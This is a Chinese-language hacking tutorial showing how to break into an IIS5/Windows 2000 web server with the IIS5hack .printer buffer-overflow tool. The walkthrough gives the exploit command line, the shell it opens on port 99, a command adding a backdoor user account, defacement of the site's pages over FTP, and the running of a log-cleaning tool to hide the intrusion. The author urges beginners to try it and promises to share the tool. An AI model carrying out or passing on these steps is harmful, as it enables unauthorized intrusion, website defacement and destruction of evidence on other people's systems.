| 添加到收藏夹 | 返回目录页 | 上一篇:ftp服务器的安全实现 |
IIS入侵实例
一.前言
哈哈~大家好,我Bytes由來給大家寫教程了,哦~對不起,呵呵,去臺灣轉了一下還沒把輸入法條過來,少等^!^……(Ctrl+Shift)
呵呵~现在一切正常.首先申明,本文不是什么"宝典武学".
我给大家说说现在最时髦的入侵IIS5的手法(什么这也有流行时尚??!).现在的IIS5NULL.printer边界监测问题的缓冲区溢出的漏洞实在是比比皆是,国内如此国外也一样..SUNx的IIs5hack,这一工具能很好的帮助你完成攻击任务!(明白了吧~~本文是写给初学者看的!不要以为学会这些就可以妄称黑客!)过几天我给狂刀兄让他传上来,给大家用用(怎么样??Bytes很不错吧,大\好人呀)
二.过程
言归正传,开始我们今天的攻击任务.
目标:www.xxx.com.tw(马赛克处理,我可不想被人骂~~~哈哈哈)
web server:Microsoft IIS/5.0
OS: win2k
嗯~先扫一下他开放端口先(这是通常情况下的攻击第一部):
Open 21(ftp)!!!
Open 23(telnet)!!!(靠!win2k开着telnet,呵呵~不错)
Open 25(stmp)!!!
Open 79(finger)!!!(我喜欢!哈哈)
Open 80 (http)!!!
Open 110(pop)!!!
Open 3389 (unknow)!!!(呵呵~想必这个没用,呵呵~)
ALL DONE!!!(完毕)
嗯~ftp应该是5.0版本的,win2k嘛~应该没什么厉害的漏洞.
不管怎样telnet上去看看先:
开始->运行->(本地菜单)输入:telnet www.xxx.com.tw
嗯~怎么还不出来?光标还在动.."连接丢失!"(My Dod!!!!这是一个伪端口,或者石有防火墙!)看来telnet行不通.
finger看看,特telnet www.xxx.com.tw 79:
"无法连接!"
我昏~什么破扫描啊~哦~忘记了不能骂作者的,因为好像这个是我自己写的,没打算发表,烂了点!呵呵~
那么只好暴力一点从80(http)突破了~呵呵~(怎么像有在偷看MM洗澡的感觉?!)
扫一下看看Unicode怎么样:
No Found!!
All Done!
哈哈~我好霉气~5555555555(TMD,God跟我开玩笑吧?)
嗯~咦~对了不是有NULL.printer的溢出程序吗??哈哈~你还不死,这个漏洞很新的,想必你没补..(偷看人家洗澡怎么还走进去?!)
哈哈!我运气好!先把IIS5hack.exe解压缩,改名成"IIS.exe"(名字短一点,我很懒的..hehe),放到Winnt目录下(这个程序可以在win9x/winNT/win2k运行),这样可以把它当作一个windows组件用.(win9x用户,你可以放到windows目录).
start..
开始->运行->(本地菜单)输入:iis(看一下用法先)
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
usage: C:\WINDOWS\IIS.EXE
chinese edition: 0
chinese edition, sp1: 1 #(对付中文版,sp1就不用我说什么意思了吧??呵呵~Unix类的系统用多了~"#"注译改不过来!)
english edition: 2
english edition, sp1: 3 #(对付E文版)
japanese edition: 4
japanese edition, sp1: 5#(对付日文版)
好~Let me do it!......
开始->运行->(本地菜单)输入:iis www.xxx.com.tw 80 1 (tw的服务器,当然是中文的,该程序简体繁体不区分)
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
connecting...
sending...
Now you can telnet to 99 port
good luck :)
好~我们telnet 99来看一看!
Microsoft Windows 2000 [セ 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
哈哈哈哈哈~好极了,绑定了一个cmdshell,接着来:
Microsoft Windows 2000 [セ 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>net user
\\ ㄏノ眀め
-------------------------------------------------------------------------------
Administrator Guest
IUSR_BIG IWAM_BIG TsInternetUser
磅︽Ч拨祇ネ┪岿粇
呵呵,这么几个用户,不过现在我应该是system用户权限才是,呵呵~添加一
个用户先
Microsoft Windows 2000 [セ 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>net user
\\ ㄏノ眀め
-------------------------------------------------------------------------------
Administrator Guest
IUSR_BIG IWAM_BIG TsInternetUser
磅︽Ч拨祇ネ┪岿粇
C:\WINNT\system32>net user bin bin1234/add (注意这是在攻击目标上运行)
net user bin bin1234/add
C:\WINNT\system32>
先别退出,在开一个ftp,你就可以用bin/bin1234这个刚刚注册的用户登陆上去,修改了..别忘记load一个cleanLOG的东西,擦擦你的PP ^!^ (出事别怪我没和你说)
ftp修改了对方网页后,然后在切换回telnet
Microsoft Windows 2000 [セ 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>net user
\\ ㄏノ眀め
-------------------------------------------------------------------------------
Administrator Guest
IUSR_BIG IWAM_BIG TsInternetUser
磅︽Ч拨祇ネ┪岿粇
C:\WINNT\system32>net user bin bin1234/add (注意这是在攻击目标上运行)
net user bin bin1234/add
C:\WINNT\system32>c:\inetpub\wwwroot\cleanLOG.exe(一般你上传就在这个目录下,注意cleanLOG是我假设的.运行他,擦擦咱的PP)
C:\WINNT\system32>exit(做完了,走人??
过几天大家来本站找iis5hack用吧,呵呵~~最后谢谢大家看我的文章..
~~~~~~~BB
最热门文章推荐:
>· 脚本语言
>· c语言编辑器
>· 网站建设流程
>· 网站建设策划书
>· 数控车床编程
>· c编程
>· 编程心得
>· unix文件系统
下一篇:保护服务器安全的热点技术
↓相关文章:
- · 保护服务器安全的热点技术
- · 入侵检测方法和缺陷
- · 微软虚拟机(MicrosoftVM)的安全缺陷
- · 基于Mscan的蠕虫结构分析
- · 木马喜欢“呆”在哪里
- · 特洛伊木马程序的缺省端口
- · 80端口web服务攻击痕迹
- · Windows新漏洞将任意用户提升到SYSTEM级别的权限的方法
- · 入侵者跳越攻击可能进入你的内部网
- · 黑国内一黑客站点主机的过程
- · 利用尼姆达II病毒提升自己为系统管理员
- · 企业网安全从边界做起
- · 如何突破各种防火墙的防护
- · 了解数字证书
- · 超越技术视野的中国信息安全应急体系
- · 病毒防治的原理比较
- · 硬盘保护卡的破解
- · 动态ARP可导致整个TCP/IP网络中断
- · 密码学简介
- · KV3000修复硬盘数据办法!!
- · 利用mpd搭建基于PPTP协议的企业级VPN
- · 网络攻击的六大趋势
- · 剖析入侵检测系统的安全性
- · 网上银行的安全性分析
- · 局域网的维护之网络安全
- · Linux系统中的防火墙技术及其应用
- · 关闭危险之门,防止黑客入侵
- · IT主管:网络安全从哪入手?
- · 三招助您简化网络安全
- · 电信业网络安全综合解决方案
- · Juniper网络安全方案餐饮连锁店应用
- · SecurityGateway3.0垃圾邮件的清道夫
- · WebShield和SpamKiller3000安全解决方案
- · 国税系统网络安全解决方案
- · 如何加强政府网络的全方位安全性?
- · 构建铜墙铁壁式的企业网络
- · 安全简单实用
- · 某市电信局网络安全解决方案
- · ICMP路由通告的安全问题描述及解决措施
- · 中国人民银行在广域网下的防病毒方案
- · 对安全项目的规划与管理
- · 银行网络安全系统技术方案
- · 网络安全与系统稳定性保障的解决方案
- · “网络巡警”保安全
- · 将安全触角延伸到每一角落——晓通网络商务楼用户宽带接入安全解决方案
- · 建筑立体防毒网——McAfee银行业防病毒方案
- · FENSTS网络安全整体解决方案
- · 政府上网,安全第一
- · 税务系统网络安全解决方案
- · 银行网络安全解决方案
- · 证券行业网络安全解决方案
- · 金融网络的安全分析及设计
- · 如何加强政府网络的安全
- · 网络安全综合解决方案
- · 趋势科技校园网安全方案
- · MiKey在网络办公中的安全解决方案
- · iGate易门访问控制安全解决方案
- · 瑞星专业化网络安全解决方案概述
- · 中联通讯信息安全体系之VPN解决方案
- · 网络安全整体解决方案
- · 格方网上银行系统安全解决方案
- · 电信行业网络安全解决方案(二)
- · 电信行业网络安全解决方案(一)
- · 江苏电信IP网网络安全解决方案
- · “黑客煞星”实现静态与动态平衡
- · 国内黑客高手的联系方法
- · 企业网安全分析
- · 防毒因模式而异
- · 如何选择防病毒系统
- · 安全方案面面观
- · 安全统一管理方案一览
- · 网络广告的优势与特点
- · 如何让你的网络广告更有效——网络广告策划策略探索
- · 网络广告效果已被认可发展前景颇为乐观
- · 3721上网助手拦截全部广告提升上网速度
- · 2003年中国网络广告十大盘点
- · 炼狱里的网络广告
- · 网络广告成大公司新宠05年将达80亿
- · 分析:2004弹出式广告已到生死关头
- · 弹出广告,效果才是硬道理?

